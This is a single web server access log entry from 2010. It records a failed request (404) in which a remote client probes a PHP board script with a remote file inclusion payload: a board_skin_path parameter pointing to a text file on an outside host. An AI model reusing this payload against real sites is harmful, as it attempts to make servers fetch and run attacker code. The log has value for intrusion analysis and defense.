203.59.136.42 - - [02/Mar/2010:10:05:53 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
